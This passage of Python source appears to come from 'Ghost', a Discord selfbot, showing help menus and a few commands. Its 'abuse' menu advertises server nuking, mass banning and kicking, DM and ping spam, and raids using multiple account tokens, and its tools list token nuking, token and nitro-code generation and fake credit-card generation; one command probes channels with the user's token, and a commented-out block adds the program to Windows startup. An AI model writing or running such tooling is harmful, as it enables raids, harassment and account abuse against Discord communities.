`{Ghost.command_prefix}`**sounds** » Toggle Ghost notification sounds.
`{Ghost.command_prefix}`**notifications** » Toggle Ghost notification.
""")
embed.set_author(name="Selfbot Commands (1/1)")
embed.set_thumbnail(url=__embedimage__)
embed.set_image(url=__embedlargeimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
pass
else:
await ctx.send(f"""```ini
[ Selfbot Commands ]
{Ghost.command_prefix}settings » The bot's settings.
{Ghost.command_prefix}restart » Restart Ghost selfbot.
{Ghost.command_prefix}prefix [prefix] » Set the command prefix.
{Ghost.command_prefix}dumpchat [amount] (channel id) (oldest first, true/false) » Get the chat's history.
{Ghost.command_prefix}invite » Get Ghost's Discord server invite link.
{Ghost.command_prefix}addccmd [name] [response] » Add a custom command.
{Ghost.command_prefix}delccmd [name] » Delete a custom command.
{Ghost.command_prefix}detections » A list of all detections.
{Ghost.command_prefix}snipers » A list of all snipers.
{Ghost.command_prefix}enablesniper [type] » Enable a sniper.
{Ghost.command_prefix}disablesniper [type] » Disable a sniper.
{Ghost.command_prefix}enabledetect [type] » Enable a detection.
{Ghost.command_prefix}disabledetect [type] » Disable a detection.
{Ghost.command_prefix}riskmode » Disable and enable risk mode.
{Ghost.command_prefix}sounds » Toggle Ghost notification sounds.
{Ghost.command_prefix}notifications » Toggle Ghost notification.
# {__embedfooter__}```""", delete_after=__deletetimeout__)
@Ghost.command(name="webhook", description="Webhook related commands.", usage="webhook")
async def webhook(ctx, page:int = 1):
if __embedmode__:
if page == 1:
embed = discord.Embed(title=f"{__embedemoji__} **{__embedtitle__}** {__embedemoji__}", color=__embedcolour__, description=f"""
`{Ghost.command_prefix}`**delwebhook [id]** » Delete a webhook from the ID.
`{Ghost.command_prefix}`**newwebhook [name]** » Create a webhook in the command channel.
`{Ghost.command_prefix}`**spamwebhook [amount] [url] (message)** » Spam the shit out of a webhook.
`{Ghost.command_prefix}`**webhooksetup** » Creates a new server with webhooks.
`{Ghost.command_prefix}`**webhookinfo [id]** » Information about the webhook.
""")
embed.set_author(name="Webhook Commands (1/1)")
embed.set_thumbnail(url=__embedimage__)
embed.set_image(url=__embedlargeimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
pass
else:
await ctx.send(f"""```ini
[ Webhook Commands ]
{Ghost.command_prefix}delwebhook [id] » Delete a webhook from the ID.
{Ghost.command_prefix}newwebhook [name] » Create a webhook in the command channel.
{Ghost.command_prefix}spamwebhook [amount] [url] (message) » Spam the shit out of a webhook.
{Ghost.command_prefix}webhooksetup » Creates a new server with webhooks.
{Ghost.command_prefix}webhookinfo [id] » Information about the webhook.
# {__embedfooter__}```""", delete_after=__deletetimeout__)
@Ghost.command(name="abuse", description="Abuse related commands.", usage="abuse")
async def abuse(ctx, page:int = 1):
if __riskmode__:
if __embedmode__:
if page == 1:
embed = discord.Embed(title=f"{__embedemoji__} **{__embedtitle__}** {__embedemoji__}", color=__embedcolour__, description=f"""
`{Ghost.command_prefix}`**spam [amount] [delay] [message]** » Spam X amount of times.
`{Ghost.command_prefix}`**stopspam** » Stop spamming messages.
`{Ghost.command_prefix}`**dmspam [amount] [delay] [@user] [message]** » Spam DM messages X amount of times.
`{Ghost.command_prefix}`**channelspam [amount] [delay] [message]** » Spam a message X amount of times in every channel.
`{Ghost.command_prefix}`**threadspam [delay] [amount] [addusers | true/false] [name] [startmessage]** » Spam create threads with a starting message.
`{Ghost.command_prefix}`**ttsspam [amount] [delay] [message]** » Spam TTS messages X amount of times.
`{Ghost.command_prefix}`**reactspam [emoji] [messages]** » Spam reactions on X amount of messages.
`{Ghost.command_prefix}`**massghostping [delay] [@user]** » Ghost Ping the user in every channel.
`{Ghost.command_prefix}`**ghostping [@user]** » Ping a user then delete the message.
`{Ghost.command_prefix}`**massping (amount of messages) (send delay)** » Ping a mass amount of people in the command server.
`{Ghost.command_prefix}`**massnick [nickname]** » Change the nickname of all members in the command server.
`{Ghost.command_prefix}`**massdm [delay] [amount] [message]** » Send a DM message to everyone in the server.
`{Ghost.command_prefix}`**nukeserver** » Delete all roles and channels in the command server.
`{Ghost.command_prefix}`**destroyserver** » Completely destroy the command server.
`{Ghost.command_prefix}`**deletechannels** » Delete all of the command server's channels.
`{Ghost.command_prefix}`**deleteroles** » Delete all of the command server's roles.
`{Ghost.command_prefix}`**spamchannels [amount] (name)** » Spam create channels with a desired name. (Thanks Port <3)
`{Ghost.command_prefix}`**spamroles [amount] (name)** » Spam create roles with a desired name.
`{Ghost.command_prefix}`**raidjoin [delay] [invite]** » Make all your account tokens join a server.
`{Ghost.command_prefix}`**tokenraid [amount] [channel id] (message)** » Raid a server with all your account tokens.
`{Ghost.command_prefix}`**massban** » Ban all the members in the command server.
`{Ghost.command_prefix}`**masskick** » Kick all the members in the command server.
""")
embed.set_author(name="Abuse Commands (1/1)")
embed.set_thumbnail(url=__embedimage__)
embed.set_image(url=__embedlargeimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
pass
else:
await ctx.send(f"""```ini
[ Abuse Commands ]
{Ghost.command_prefix}spam [amount] [delay] [message] » Spam X amount of times.
{Ghost.command_prefix}stopspam » Stop spamming messages.
{Ghost.command_prefix}dmspam [amount] [delay] [@user] [message] » Spam DM messages X amount of times.
{Ghost.command_prefix}channelspam [amount] [delay] [message] » Spam X amount of times in all channels.
{Ghost.command_prefix}threadspam [delay] [amount] [name] [startmessage] » Spam create threads with a starting message.
{Ghost.command_prefix}ttsspam [amount] [delay] [message] » Spam TTS messages X amount of times.
{Ghost.command_prefix}reactspam [emoji] [messages] » Spam reactions on X amount of messages.
{Ghost.command_prefix}massghostping [delay] [@user] » Ghost Ping the user in every channel.
{Ghost.command_prefix}ghostping [@user] » Ping a user then delete the message.
{Ghost.command_prefix}massping » Ping a mass amount of people in the command server.
{Ghost.command_prefix}massnick [nickname] » Change the nickname of all members in the command server.
{Ghost.command_prefix}massdm [delay] [amount] [message] » Send a DM message to everyone in the server.
{Ghost.command_prefix}nukeserver » Delete all roles and channels in the command server.
{Ghost.command_prefix}destroyserver » Completely destroy the command server.
{Ghost.command_prefix}deletechannels » Delete all of the command server's channels.
{Ghost.command_prefix}deleteroles » Delete all of the command server's roles.
{Ghost.command_prefix}spamchannels [amount] (name) » Spam create channels with a desired name. (Thanks Port <3)
{Ghost.command_prefix}spamroles [amount] (name) » Spam create roles with a desired name.
{Ghost.command_prefix}raidjoin [delay] [invite] » Make all your account tokens join a server.
{Ghost.command_prefix}tokenraid [amount] [channel id] (message) » Raid a server with all your account tokens.
{Ghost.command_prefix}massban » Ban all the members in the command server.
{Ghost.command_prefix}masskick » Kick all the members in the command server.
# {__embedfooter__}```""", delete_after=__deletetimeout__)
else:
if __embedmode__:
embed = discord.Embed(title=f"Abusive Commands", color=__embedcolour__, description=f"You have risk mode disabled, you cant use this command.")
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send(f"""```ini
[ Abuse Commands ]
You have risk mode disabled, you cant use this command.
# {__embedfooter__}```""", delete_after=__deletetimeout__)
@Ghost.command(name="tools", description="Discord and other tools.", usage="tools", aliases=["utilities", "utils"])
async def tools(ctx, page:int = 1):
if __embedmode__:
if page == 1:
embed = discord.Embed(title=f"{__embedemoji__} **{__embedtitle__}** {__embedemoji__}", color=__embedcolour__, description=f"""
`{Ghost.command_prefix}`**tokeninfo [token]** » Information about a token.
`{Ghost.command_prefix}`**nuketoken [token]** » Nuke a token.
`{Ghost.command_prefix}`**checktoken [token]** » Checks if a token is working.
`{Ghost.command_prefix}`**checktokens** » Check your tokens.
`{Ghost.command_prefix}`**nitrogen** » Generate a nitro code.
`{Ghost.command_prefix}`**tokengen** » Generate a discord user token.
`{Ghost.command_prefix}`**identitygen** » Generate a fake identity.
`{Ghost.command_prefix}`**passwordgen [length]** » Generate a secure password.
`{Ghost.command_prefix}`**ccgen** » Generate a fake Credit card.
`{Ghost.command_prefix}`**eval** » very scary and haram.
""")
embed.set_author(name="Tools (1/1)")
embed.set_thumbnail(url=__embedimage__)
embed.set_image(url=__embedlargeimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
pass
else:
await ctx.send(f"""```ini
[ Tools ]
{Ghost.command_prefix}tokeninfo [token] » Information about a token.
{Ghost.command_prefix}nuketoken [token] » Nuke a token.
{Ghost.command_prefix}checktoken [token] » Checks if a token is working.
{Ghost.command_prefix}checktokens » Check your tokens.
{Ghost.command_prefix}nitrogen » Generate a nitro code.
{Ghost.command_prefix}tokengen » Generate a discord user token.
{Ghost.command_prefix}identitygen » Generate a fake identity.
{Ghost.command_prefix}passwordgen [length] » Generate a secure password.
{Ghost.command_prefix}ccgen » Generate a fake Credit card.
{Ghost.command_prefix}eval » very scary and haram.
# {__embedfooter__}```""", delete_after=__deletetimeout__)
@Ghost.command(name="giveaway", description="Giveaway related commands.", usage="giveaway")
async def giveaway(ctx, page:int = 1):
if __embedmode__:
if page == 1:
embed = discord.Embed(title=f"{__embedemoji__} **{__embedtitle__}** {__embedemoji__}",
color=__embedcolour__, description=f"""
`{Ghost.command_prefix}`**gstart [duration] [winners] [prize]** » Start a giveaway in the same channel
`{Ghost.command_prefix}`**gend [message id]** » End a giveaway
`{Ghost.command_prefix}`**greroll [message id]** » Re-roll a giveaway
""")
embed.set_author(name="Giveaway Commands (1/1)")
embed.set_thumbnail(url=__embedimage__)
embed.set_image(url=__embedlargeimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
pass
else:
await ctx.send(f"""```ini
[ Giveaway Commands ]
{Ghost.command_prefix}gstart [duration] [winners] [prize] » Start a giveaway in the same channel
{Ghost.command_prefix}gend [message id] » End a giveaway
{Ghost.command_prefix}greroll [message id] » Re-roll a giveaway
# {__embedfooter__}```""", delete_after=__deletetimeout__)
@Ghost.command(name="proxy", description="Proxy related commands.", usage="proxy")
async def proxy(ctx, page:int=1):
if __embedmode__:
if page == 1:
embed = discord.Embed(title=f"{__embedemoji__} **{__embedtitle__}** {__embedemoji__}",
color=__embedcolour__, description=f"""
`{Ghost.command_prefix}`**proxies http** » Scrape HTTP proxies.
`{Ghost.command_prefix}`**proxies https** » Scrape HTTPS proxies.
`{Ghost.command_prefix}`**proxies socks4** » Scrape SOCKS4 proxies.
`{Ghost.command_prefix}`**proxies socks5** » Scrape SOCKS5 proxies.
`{Ghost.command_prefix}`**proxies all** » Scrape HTTP, HTTPS, SOCKS4 AND SOCKS5 proxies.
""")
embed.set_author(name="Proxy Commands (1/1)")
embed.set_thumbnail(url=__embedimage__)
embed.set_image(url=__embedlargeimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
pass
else:
await ctx.send(f"""```ini
[ Proxy Commands ]
{Ghost.command_prefix}proxies http » Scrape HTTP proxies.
{Ghost.command_prefix}proxies https » Scrape HTTPS proxies.
{Ghost.command_prefix}proxies socks4 » Scrape SOCKS4 proxies.
{Ghost.command_prefix}proxies socks5 » Scrape SOCKS5 proxies.
{Ghost.command_prefix}proxies all » Scrape HTTP, HTTPS, SOCKS4 AND SOCKS5 proxies.
# {__embedfooter__}```""", delete_after=__deletetimeout__)
@Ghost.command(name="hiddenchannels", description="Sends a list of all the channels you cant see.", usage="hiddenchannels (guild id)")
async def hiddenchannels(ctx, guild=None):
if guild == None:
guild = ctx.guild
else:
guild = await Ghost.fetch_guild(int(guild))
hiddenChannels = []
message = await ctx.send("Looking for hidden channels, this could take a while...")
for channel in guild.channels:
if str(channel.type).lower() != "category":
request = requests.get(f"https://discord.com/api/channels/{channel.id}", headers={"Authorization": __token__, "User-Agent": get_random_user_agent()})
if request.status_code != 200:
if __embedmode__:
hiddenChannels.append("#"+channel.name)
else:
hiddenChannels.append(channel.name)
print_info(f"{channel.name} is hidden.")
else:
print_info(f"{channel.name} is not hidden.")
# await asyncio.sleep(1)
if __embedmode__:
embed = discord.Embed(title=f"Hidden Channels", description=f"There is a total of `{len(hiddenChannels)}` hidden channels.\n \n```{', '.join(hiddenChannels)}```", color=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await message.edit(content="", embed=embed, delete_after=__deletetimeout__)
else:
await message.edit(content=f"""```ini
[ Hidden Channels ]
There is a total of {len(hiddenChannels)} hidden channels.
{', '.join(hiddenChannels)}
# {__embedfooter__}
```""", delete_after=__deletetimeout__)
@Ghost.command(name="clearconsole", description="Clear your console.", usage="clearconsole", aliases=["resetconsole", "consoleclear", "consolereset", "consoleCommand-clearconsole", "consoleCommand-clear"])
async def clearconsole(ctx):
width = os.get_terminal_size().columns
if is_windows():
os.system("cls")
os.system(f"title Ghost [{version}] [{Ghost.user}]")
# if is_windows():
# def startupPath():
# return str(shell.SHGetFolderPath(0, (shellcon.CSIDL_STARTUP, shellcon.CSIDL_COMMON_STARTUP)[0], None, 0))
# os.system("cls")
# os.system(f"title Ghost [{version}] [{Ghost.user}]")
# if (CONFIG["load_on_startup"] == True):
# print("Adding to startup.......")
# USER_NAME = getpass.getuser()
# def add_to_startup(file_path=""):
# if file_path == "":
# file_path = os.path.dirname(os.path.realpath(__file__))
# bat_file = open(startupPath() + r"\\Ghost.bat", "w")
# bat_file.write(f"cd {file_path}\nstart Ghost")
# bat_file.close()
# add_to_startup()
# else:
# print("Removing from startup......")
# if os.path.exists(startupPath() + r"\\Ghost.bat"): os.remove(startupPath() + r"\\Ghost.bat");
# os.system("cls")
if is_linux():
os.system("clear")
if consoleMode.lower() == "new":
print("")
print(fg.consoleColour + "")
print(" ██████╗ ██╗ ██╗ ██████╗ ███████╗████████╗".center(width))
print("██╔════╝ ██║ ██║██╔═══██╗██╔════╝╚══██╔══╝".center(width))
print("██║ ███╗███████║██║ ██║███████╗ ██║ ".center(width))
print("██║ ██║██╔══██║██║ ██║╚════██║ ██║ ".center(width))
print("╚██████╔╝██║ ██║╚██████╔╝███████║ ██║ ".center(width))
print(" ╚═════╝ ╚═╝ ╚═╝ ╚═════╝ ╚══════╝ ╚═╝ ".center(width))
print("")
print(fg.cWhite + f"{motd}".center(width))
print(fg.consoleColour + '─'*width)
print("")
if consoleMode.lower() == "rainbow":
print("")
print(fg.consoleColour + "")
print(fg.cRed + " ██████╗ ██╗ ██╗ ██████╗ ███████╗████████╗".center(width))
print(fg.cOrange + "██╔════╝ ██║ ██║██╔═══██╗██╔════╝╚══██╔══╝".center(width))
print(fg.cYellow + "██║ ███╗███████║██║ ██║███████╗ ██║ ".center(width))
print(fg.cGreen + "██║ ██║██╔══██║██║ ██║╚════██║ ██║ ".center(width))
print(fg.cBlue + "╚██████╔╝██║ ██║╚██████╔╝███████║ ██║ ".center(width))
print(fg.cPurple + " ╚═════╝ ╚═╝ ╚═╝ ╚═════╝ ╚══════╝ ╚═╝ ".center(width))
print("")
print(fg.cWhite + f"{motd}".center(width))
print(fg.consoleColour + '─'*width)
print("")
if consoleMode.lower() == "new2":
print("")
print(fg.consoleColour + "")
print(" ______ __ __ ______ ______ ______ ".center(width))
print("/\ ___\ /\ \_\ \ /\ __ \ /\ ___\ /\__ _\ ".center(width))
print("\ \ \__ \ \ \ __ \ \ \ \/\ \ \ \___ \ \/_/\ \/ ".center(width))
print(" \ \_____\ \ \_\ \_\ \ \_____\ \/\_____\ \ \_\ ".center(width))
print(" \/_____/ \/_/\/_/ \/_____/ \/_____/ \/_/ ".center(width))
print(" ".center(width))
print("")
print(fg.cWhite + f"{motd}".center(width))
print(fg.consoleColour + '─'*width)
print("")
if consoleMode.lower() == "new3":
print("")
print(fg.consoleColour + "")
print(" 88 ".center(width))
print(" 88 ,d ".center(width))
print(" 88 88 ".center(width))
print(" ,adPPYb,d8 88,dPPYba, ,adPPYba, ,adPPYba, MM88MMM ".center(width))
print('a8" `Y88 88P\' "8a a8" "8a I8[ "" 88 '.center(width))
print('8b 88 88 88 8b d8 `"Y8ba, 88 '.center(width))
print('"8a, ,d88 88 88 "8a, ,a8" aa ]8I 88, '.center(width))
print(' `"YbbdP"Y8 88 88 `"YbbdP"\' `"YbbdP"\' "Y888 '.center(width))
print(' aa, ,88 '.center(width))
print(' "Y8bbdP" '.center(width))
print("")
print(fg.cWhite + f"{motd}".center(width))
print(fg.consoleColour + '─'*width)
print("")
if consoleMode.lower() == "new4":
print("")
print(fg.consoleColour + "")
print(" ▄██████▄ ▄█ █▄ ▄██████▄ ▄████████ ███ ".center(width))
print(" ███ ███ ███ ███ ███ ███ ███ ███ ▀█████████▄ ".center(width))
print(" ███ █▀ ███ ███ ███ ███ ███ █▀ ▀███▀▀██ ".center(width))
print(" ▄███ ▄███▄▄▄▄███▄▄ ███ ███ ███ ███ ▀ ".center(width))
print('▀▀███ ████▄ ▀▀███▀▀▀▀███▀ ███ ███ ▀███████████ ███ '.center(width))
print(' ███ ███ ███ ███ ███ ███ ███ ███ '.center(width))
print(' ███ ███ ███ ███ ███ ███ ▄█ ███ ███ '.center(width))
print(' ████████▀ ███ █▀ ▀██████▀ ▄████████▀ ▄████▀ '.center(width))
print("")
print(fg.cWhite + f"{motd}".center(width))
print(fg.consoleColour + '─'*width)
print("")
if consoleMode.lower() == "bear":
if is_windows():
os.system("mode con: cols=90 lines=24")
print("")
print(fg.consoleColour + "")
print(" ▄▀▀▀▄▄▄▄▄▄▄▀▀▀▄ ".center(os.get_terminal_size().columns))
print(" █▒▒░░░░░░░░░▒▒█ ".center(os.get_terminal_size().columns))
print(" █░░█░░░░░█░░█ ".center(os.get_terminal_size().columns))
print(" ▄▄ █░░░▀█▀░░░█ ▄▄ ".center(os.get_terminal_size().columns))
print(" █░░█ ▀▄░░░░░░░▄▀ █░░█ ".center(os.get_terminal_size().columns))
print("█▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀█".center(os.get_terminal_size().columns))
print("█░█▀▀░░█ █░░█▀█░░█▀░░▀█▀░█".center(os.get_terminal_size().columns))
print("█░█▄█░░█▀█░░█▄█░░▄█░░ █ ░█".center(os.get_terminal_size().columns))
print("█▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄█".center(os.get_terminal_size().columns))
print("")
print(fg.cWhite + f"{motd}".center(os.get_terminal_size().columns))
print(fg.consoleColour + '─'*os.get_terminal_size().columns)
print("")
elif consoleMode.lower() == "old":
print("")
print(fg.consoleColour + "")
print(" ▄████ ██░ ██ ▒█████ ██████ ▄▄▄█████▓".center(width))
print(" ██▒ ▀█▒▓██░ ██▒▒██▒ ██▒▒██ ▒ ▓ ██▒ ▓▒".center(width))
print("▒██░▄▄▄░▒██▀▀██░▒██░ ██▒░ ▓██▄ ▒ ▓██░ ▒░".center(width))
print("░▓█ ██▓░▓█ ░██ ▒██ ██░ ▒ ██▒░ ▓██▓ ░ ".center(width))
print("░▒▓███▀▒░▓█▒░██▓░ ████▓▒░▒██████▒▒ ▒██▒ ░ ".center(width))
print(" ░▒ ▒ ▒ ░░▒░▒░ ▒░▒░▒░ ▒ ▒▓▒ ▒ ░ ▒ ░░ ".center(width))
print(" ░ ░ ▒ ░▒░ ░ ░ ▒ ▒░ ░ ░▒ ░ ░ ░ ".center(width))
print("░ ░ ░ ░ ░░ ░░ ░ ░ ▒ ░ ░ ░ ░ ".center(width))
print(" ░ ░ ░ ░ ░ ░ ░ ".center(width))
print("")
print(fg.cWhite + f"{motd}".center(width))
print(fg.consoleColour + '─'*width)
print("")
elif consoleMode not in consoleModes:
print("")
print(fg.consoleColour + "")
print(" ██████╗ ██╗ ██╗ ██████╗ ███████╗████████╗".center(width))
print("██╔════╝ ██║ ██║██╔═══██╗██╔════╝╚══██╔══╝".center(width))
print("██║ ███╗███████║██║ ██║███████╗ ██║ ".center(width))
print("██║ ██║██╔══██║██║ ██║╚════██║ ██║ ".center(width))
print("╚██████╔╝██║ ██║╚██████╔╝███████║ ██║ ".center(width))
print(" ╚═════╝ ╚═╝ ╚═╝ ╚═════╝ ╚══════╝ ╚═╝ ".center(width))
print("")
print(fg.cWhite + f"{motd}".center(width))
print(fg.consoleColour + '─'*width)
print("")
if consoleMode.lower() == "react":
print("")
print(fg.consoleColour + "")
print("██████╗ ███████╗ █████╗ ██████╗████████╗".center(width))
print("██╔══██╗██╔════╝██╔══██╗██╔════╝╚══██╔══╝".center(width))
print("██████╔╝█████╗ ███████║██║ ██║ ".center(width))
print("██╔══██╗██╔══╝ ██╔══██║██║ ██║ ".center(width))
print("██║ ██║███████╗██║ ██║╚██████╗ ██║ ".center(width))
print("╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝ ╚═════╝ ╚═╝ ".center(width))
print("")
print(fg.cWhite + f"{motd}".center(width))
print(fg.consoleColour + '─'*width)
print("")
if consoleMode.lower() == "rise":
print(fg.cBlue + "")
print("██████╗ ██╗███████╗███████╗ ███████╗███████╗██╗ ███████╗██████╗ ██████╗ ████████╗".center(width))
print("██╔══██╗██║██╔════╝██╔════╝ ██╔════╝██╔════╝██║ ██╔════╝██╔══██╗██╔═══██╗╚══██╔══╝".center(width))
print("██████╔╝██║███████╗█████╗ ███████╗█████╗ ██║ █████╗ ██████╔╝██║ ██║ ██║ ".center(width))
print("██╔══██╗██║╚════██║██╔══╝ ╚════██║██╔══╝ ██║ ██╔══╝ ██╔══██╗██║ ██║ ██║ ".center(width))
print("██║ ██║██║███████║███████╗ ███████║███████╗███████╗██║ ██████╔╝╚██████╔╝ ██║ ".center(width))
print("╚═╝ ╚═╝╚═╝╚══════╝╚══════╝ ╚══════╝╚══════╝╚══════╝╚═╝ ╚═════╝ ╚═════╝ ╚═╝ ".center(width))
print("╭─━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━─╮")
print(fg.cGrey + f"Connected: {Ghost.user} | Prefix: {Ghost.command_prefix} | Servers: {len(Ghost.guilds)}".center(width))
print(fg.cBlue + "╰─━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━─╯")
print("")
print(fg.cBlue + '━'*width)
print("")
if consoleMode.lower() == "nighty":
if is_windows():
os.system("mode con: cols=90 lines=24")
os.system("cls")
if is_linux():
os.system("resize -s 24 90")
os.system("clear")
print("")
print(f" {fg.cWhite}██████{fg.cBlue}╗ {fg.cWhite}██{fg.cBlue}╗ {fg.cWhite}██{fg.cBlue}╗ {fg.cWhite}██████{fg.cBlue}╗ {fg.cWhite}███████{fg.cBlue}╗{fg.cWhite}████████{fg.cBlue}╗")
print(f" {fg.cWhite}██{fg.cBlue}╔════╝ {fg.cWhite}██{fg.cBlue}║ {fg.cWhite}██{fg.cBlue}║{fg.cWhite}██{fg.cBlue}╔═══{fg.cWhite}██{fg.cBlue}╗{fg.cWhite}██{fg.cBlue}╔════╝╚══{fg.cWhite}██{fg.cBlue}╔══╝")
print(f" {fg.cWhite}██{fg.cBlue}║ {fg.cWhite}███{fg.cBlue}╗{fg.cWhite}███████{fg.cBlue}║{fg.cWhite}██{fg.cBlue}║ {fg.cWhite}██{fg.cBlue}║{fg.cWhite}███████{fg.cBlue}╗ {fg.cWhite}██{fg.cBlue}║ ")
print(f" {fg.cWhite}██{fg.cBlue}║ {fg.cWhite}██{fg.cBlue}║{fg.cWhite}██{fg.cBlue}╔══{fg.cWhite}██{fg.cBlue}║{fg.cWhite}██{fg.cBlue}║ {fg.cWhite}██{fg.cBlue}║╚════{fg.cWhite}██{fg.cBlue}║ {fg.cWhite}██{fg.cBlue}║ ")
print(f" {fg.cBlue}╚{fg.cWhite}██████{fg.cBlue}╔╝{fg.cWhite}██{fg.cBlue}║ {fg.cWhite}██{fg.cBlue}║╚{fg.cWhite}██████{fg.cBlue}╔╝{fg.cWhite}███████{fg.cBlue}║ {fg.cWhite}██{fg.cBlue}║ ")
print(f" {fg.cBlue}╚═════╝ ╚═╝ ╚═╝ ╚═════╝ ╚══════╝ ╚═╝ ")
print("")
print(f"{fg.cWhite}Status: {fg.cGreen}Connected")
print(f"{fg.cWhite}Account: {Ghost.user} [{len(Ghost.guilds)} servers] [{len(get_friends(__token__))} friends]")
print(f"{fg.cWhite}Prefix: {Ghost.command_prefix}")
print(fg.cWhite + '─'*os.get_terminal_size().columns)
# def getCurrentTime():
# return datetime.now().strftime("%H:%M")
# def print_important(message):
# print(f"{fg.cGrey}{getCurrentTime()} | {fg.cPurple}[Important] {fg.cGrey} | {message}")
# def print_info(message):
# print(f"{fg.cGrey}{getCurrentTime()} | {fg.cYellow}[Information] {fg.cGrey} | {message}")
# def print_cmd(command):
# print(f"{fg.cGrey}{getCurrentTime()} | {fg.consoleColour}[Command] {fg.cGrey} | {Ghost.command_prefix}{command}")
# def print_sharecmd(author, command):
# print(f"{fg.cGrey}[{getCurrentTime()}] {fg.consoleColour}[SHARE COMMAND] {fg.cWhite}({author}) {command}")
# def print_error(error):
# print(f"{fg.cGrey}{getCurrentTime()} | {fg.cRed}[Error] {fg.cGrey} | {error}")
# def print_detect(message):
# print(f"{fg.cGrey}{getCurrentTime()} | {fg.cPink}[Detect] {fg.cGrey} | {message}")
# def print_sniper(message):
# print(f"{fg.cGrey}{getCurrentTime()} | {fg.cOrange}[Sniper] {fg.cGrey} | {message}")
# def print_sniper_info(firstmessage, secondmessage):
# print(f"{fg.cGrey}{getCurrentTime()} | {fg.cOrange}[Sniper] {fg.cGrey} | {firstmessage} | {secondmessage}")
if "beta" in version.lower():
print_important("You're currently using a beta build of Ghost.")
print_important("If you notice any bugs please report them to the developer.")
print(" ")
elif "dev" in version.lower():
print_important("You're currently using a developer build of Ghost.")
print_important("If you notice any bugs please report them to the developer.")
print(" ")
@Ghost.command(name="blocksend", description="Send a message to a blocked user.", usage="blocksend [user id] [messages]", aliases=["sendblocked", "sendtoblocked"])
async def blocksend(ctx, userid:int, *, message):
user = await Ghost.fetch_user(userid)
await user.unblock()
await user.send(message)
await user.block()
if __embedmode__:
embed = discord.Embed(title=f"Block Send", description=f"Sent `{message}` to {user}.", color=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send(f"Sent `{message}` to {user}.", delete_after=__deletetimeout__)
@Ghost.command(name="riskmode", description="Disable and enable risk mode", usage="riskmode")
async def riskmode(ctx):
global __riskmode__
riskModeText = ""
if __riskmode__:
__riskmode__ = False
cfg = Config.getConfig()
cfg["riskmode"] = False
Config.saveConfig(cfg)
riskModeText = "disabled"
else:
__riskmode__ = True
cfg = Config.getConfig()
cfg["riskmode"] = True
Config.saveConfig(cfg)
riskModeText = "enabled"
if __embedmode__:
embed = discord.Embed(description=f"Risk mode has been {riskModeText}.", color=__embedcolour__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send(f"Risk mode has been {riskModeText}.", delete_after=__deletetimeout__)
@Ghost.command(name="embedmode", description="Toggle embed mode.", usage="embedmode")
async def embedmode(ctx):
global __embedmode__
if not __embedmode__:
__embedmode__ = True
cfg = Config.getConfig()
cfg["embed_mode"] = True
Config.saveConfig(cfg)
if __embedmode__:
embed = discord.Embed(title=f"Embed mode has been enabled.", color=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send("Embed mode has been enabled.", delete_after=__deletetimeout__)
else:
if __embedmode__:
embed = discord.Embed(title=f"Embed mode is already enabled.", color=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send("Embed mode is already enabled.", delete_after=__deletetimeout__)
@Ghost.command(name="textmode", description="Toggle text mode.", usage="textmode")
async def textmode(ctx):
global __embedmode__
if __embedmode__:
__embedmode__ = False
cfg = Config.getConfig()
cfg["embed_mode"] = False
Config.saveConfig(cfg)
if __embedmode__:
embed = discord.Embed(title=f"Text mode has been enabled.", color=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send("Text mode has been enabled.", delete_after=__deletetimeout__)
else:
if __embedmode__:
embed = discord.Embed(title=f"Text mode is already enabled.", color=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
